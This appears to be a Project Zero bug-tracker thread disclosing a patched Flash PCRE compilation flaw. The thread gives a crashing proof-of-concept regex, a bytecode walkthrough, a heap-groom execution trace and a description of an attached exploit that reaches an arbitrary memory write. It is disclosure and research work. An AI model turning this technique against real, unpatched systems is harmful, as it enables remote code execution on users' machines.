ericmckean / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Flash PCRE regex compilation logic issue #199

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
There’s a logic error in the PCRE engine version used in Flash that allows 
the execution of arbitrary PCRE bytecode, with potential for memory corruption 
and RCE. 

The issue is in the handling of the \c escape sequence (single ascii character) 
when followed by a multibyte utf8 character. The resulting bytecode will be 
treated differently by several code paths in pcre_compile.cpp, resulting in 
several interesting possibilities.

Simplest testcase that will crash in an ASAN build of of avmshell is the 
following:

\\c\xd0\x80+(?1)

The first component is a forced-ascii literal, which then takes the first byte 
of our multibyte character

\       <---- start of escape sequence
c       <---- single ascii character
\xd0    <---- this must be our ascii character

\x80    <---- look, another single character
+       <---- simplify this expression to a repeated \x80

At this point, our emitted bytecode is the following:

OP_BRA  <---- (1) standard opening for start of regex
OP_CHAR <---- (2) one character
\xd0
OP_PLUS <---- (3) one character, repeated
\x80

Now when we get to (?1), we need to search for group number one. The search 
proceeds as follows:

OP_BRA  <---- (1) this is not our group, it doesn't capture

OP_CHAR <---- (2) a character, we need to check if it's multibyte
\xd0    <------------- it's a multibyte utf8 character
OP_PLUS <------------- better skip the second byte

\x80    <---- (3) don't know this one - let's go look up how long it is in our 
lookup table...

Highest opcode is 109, so we read off the end of the lookup table.

We can abuse this on a normal non-ASAN build; after the array is a table of 
strings; and _pcre_OP_length[0x80] will return us an instruction length of 110

+ 110   <---- (4) somewhere on the heap...

Search then proceeds until we find the right bytecode for the group we were 
looking for, or finds OP_END or a NULL. It then fills in the opcode for a jump 
out to where it found that group.

See attached for an execution trace demonstrating a heap-groom and arbitrary 
regex bytecode execution (the regex used is slightly different to the above 
poc). Prior to this trace, a groom has been performed to leave a gap of size 
335 followed by a crafted buffer.

compile_branch  <---- first compile to establish length of regex
start_byte 41 (A)
start_byte 41 (A)
… snip …
start_byte 41 (A)
start_byte 41 (A)
start_byte 28 (()
compile_branch
start_byte 5c (\)
start_byte 80 (�)
start_byte 2a (*)
start_byte 29 ())
start_byte 3f (?)
start_byte 28 (()
start_byte 00 ()
malloc(335) [0x602a0001c8e0 - 0x602a0001ca2f] <--- note legitimate buffer ends 
at ca2f
compile_branch <---- second compile to produce regex bytecode in the buffer 
allocated above
start_byte 41 (A)
start_byte 41 (A)
… snip ...
start_byte 41 (A)
start_byte 41 (A)
start_byte 28 (()
compile_branch
start_byte 5c (\)
start_byte 80 (�)
start_byte 2a (*)
start_byte 29 ())
start_byte 3f (?)
start_byte 28 (()
from here1
code 0x602a0001c910 93 3 <---- print in find_bracket, last no. is 
_pcre_OP_lengths[c]
code 0x602a0001c913 27 2
code 0x602a0001c915 27 2
… snip ...
code 0x602a0001ca0f 27 2
code 0x602a0001ca11 27 2
code 0x602a0001ca13 102 1
code 0x602a0001ca14 94 1
code 0x602a0001ca19 27 2
code 0x602a0001ca1c 30 2
code 0x602a0001ca1e 128 110 <---- whoops
code 0x602a0001ca8c 35 2    <---- now outside legitimate heap buffer
code 0x602a0001ca8e 35 2
… snip ...
exec 0x602a0001c910 93 [0x601a0000cea0] <--- regex execution starts
exec 0x602a0001c913 27 [0x601a0000cea0]
exec 0x602a0001c915 27 [0x601a0000cea1]
… snip ....
exec 0x602a0001ca0f 27 [0x601a0000cf1e]
exec 0x602a0001ca11 27 [0x601a0000cf1f]
exec 0x602a0001ca13 102 [0x601a0000cf20]
exec 0x602a0001ca14 94 [0x601a0000cf20]
exec 0x602a0001ca19 27 [0x601a0000cf20]
exec 0x602a0001ca22 92 [0x601a0000cf20]
exec 0x602a0001ca25 81 [0x601a0000cf20]
exec 0x602a0001cae9 35 [0x601a0000cf20] <--- regex execution in our buffer of 
‘#’
exec 0x602a0001caeb 35 [0x601a0000cf20]

A patch for this issue against the github avmplus source is attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by markbr...@google.com on 25 Nov 2014 at 10:53

Attachments:

GoogleCodeExporter commented 9 years ago
[Setting owner to cevans@google.com. I think we should use owner to represent 
whoever is doing the comms with the vendor]

Original comment by cev...@google.com on 28 Nov 2014 at 9:08

GoogleCodeExporter commented 9 years ago
Updating with additional information sent to vendor in response to request for 
a crash repro:

It's quite an awkward bug to provide a reliable crash repro for, as with the 
way the Flash heap works the out-of-bounds reads will almost always result in a 
silent failure to compile the regex - to get a crash directly from this issue 
you will need good instrumentation such as ASAN. One way to see that the bug 
has occurred is to instrument find_bracket in pcre_compile.cpp to print the 
pointer that it's currently dereferencing, something like changing the start of 
the function to:

static const uschar *
find_bracket(const uschar *code, BOOL utf8, int number)
{
for (;;)
  {
    register int c = *code;
    fprintf(stderr, "code %p %i\n", code, c);
    if (c == OP_END) return NULL;

The example shown wasn't being triggered from actionscript though, it was a 
custom harness to test the regex engine, so I don't have an abc to hand. The 
provided regex should cause an OOB read crash under ASAN or valgrind though 
when called from the RegExp object.

See attached for a partial exploit for this issue in desktop Flash; it uses 
this vulnerability to get arbitrary bytecode executed (in CompileRegex), and 
then leverages this to corrupt the length of a Vector.<uint> object on the 
heap. The provided file will then use this corrupted vector object to write the 
value 0x41414141 to address 0x40404040. As it requires some heap manipulation, 
mileage may vary - this has only been tested on the standard Flash on Windows 
8.1 x64 running in 32-bit desktop Internet Explorer on my laptop.

Original comment by markbr...@google.com on 17 Dec 2014 at 2:22

Attachments:

GoogleCodeExporter commented 9 years ago
Supplied another crash poc to adobe.

Original comment by markbr...@google.com on 18 Dec 2014 at 5:32

Attachments:

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 4 Feb 2015 at 7:05

GoogleCodeExporter commented 9 years ago
https://helpx.adobe.com/security/products/flash-player/apsb15-04.html

Original comment by cev...@google.com on 6 Feb 2015 at 3:14

GoogleCodeExporter commented 9 years ago
Making publicly viewable; it's 7 days post-patch and there's a corresponding 
blog post: 
http://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.
html

Also fixing severity to "High"

Original comment by cev...@google.com on 12 Feb 2015 at 5:42

GoogleCodeExporter commented 9 years ago
Adding the exploit source for the blog post, as it was pointed out that I 
forgot to upload it...

Exploit has only been tested on 32-bit desktop IE running on Windows 8.1.

Original comment by markbr...@google.com on 17 Feb 2015 at 4:19

Attachments: